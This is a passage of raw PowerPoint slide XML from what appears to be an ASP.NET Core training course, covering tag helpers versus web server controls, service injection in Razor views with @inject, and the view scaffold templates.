                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30714371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Helper vs. Web Server Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tag Helper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No knowledge of browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only participates in rendering of an element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Has no Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can only modify content of HTML elements, it is scoped to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Web Server Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic browser detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Declared and invoked on a page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds functionality to DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Behavior may affect other parts of the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22970380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Demo: Tag Helpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36940541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Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 2: Razor View Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: Service Injection in Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37581003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Service Injection in Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>@inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>used for injecting dependencies in Views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service needs to be registered first with Inversion of Controller (IoC) container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> markup code at the top of view</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DFDEF1-A466-48C9-9C00-05BB95DEB340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="761999" y="2184444"/>
            <a:ext cx="7952975" cy="2539956"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6622A4DC-31F2-45C7-9429-1F5BD06F07E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="5524500"/>
            <a:ext cx="5197935" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16143962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Injected Service Definition and Consumption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Screen Clipping"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478915" y="1357482"/>
            <a:ext cx="6103485" cy="3138317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Clipping"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="29181"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1295400"/>
            <a:ext cx="4343401" cy="4714573"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="6036024"/>
            <a:ext cx="4343401" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Services\StatisticsService.cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6435157" y="4533777"/>
            <a:ext cx="4191000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Views\ToDo\Index.cshtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18439248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Demo: Service Injection in Views </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306452402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Demo: Razor Runtime Compile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14911367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Module 4: Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Scaffolding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: Scaffold Templates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275421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Creation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Views are named according to view engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Razor: *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vbhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (for classic asp.net)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View can be created through:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Action Method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="2209800"/>
            <a:ext cx="5562600" cy="3343275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40738034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Scaffold Templates - I </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows view generation based on selected model type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Empty:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Empty view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Create:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> View for creating new instance of a model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Delete: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View for deleting a model instance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Details: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View for showing model instance details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Edit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> View for editing model instance details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>List: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View for listing model instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23335865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Scaffold Templates - II</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300412" y="1719262"/>
            <a:ext cx="5591175" cy="3419475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36609252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View Organization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3981450" y="1414462"/>
            <a:ext cx="4229100" cy="46386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501464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Scaffolding Templates - III</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1923" b="3078"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7119682" y="3582116"/>
            <a:ext cx="3444240" cy="2757644"/>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4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1447800"/>
            <a:ext cx="4876800" cy="3279520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="4800601"/>
            <a:ext cx="3810000" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
